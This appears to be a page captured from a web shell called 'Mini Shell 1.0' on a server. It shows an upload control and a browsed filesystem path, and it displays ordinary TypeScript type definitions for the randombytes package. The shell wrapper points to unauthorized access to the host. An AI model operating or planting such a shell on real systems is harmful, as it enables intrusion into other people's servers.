HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/1991109/root/usr/share/nodejs/@types/randombytes/
Upload File :
Current File : //proc/1991109/root/usr/share/nodejs/@types/randombytes/index.d.ts
// Type definitions for randombytes 2.0
// Project: https://github.com/crypto-browserify/randombytes
// Definitions by: BendingBender <https://github.com/BendingBender>
// Definitions: https://github.com/DefinitelyTyped/DefinitelyTyped

/// <reference types="node" />

import { randomBytes as _randomBytes } from 'crypto';

export = randomBytes;

declare const randomBytes: typeof _randomBytes;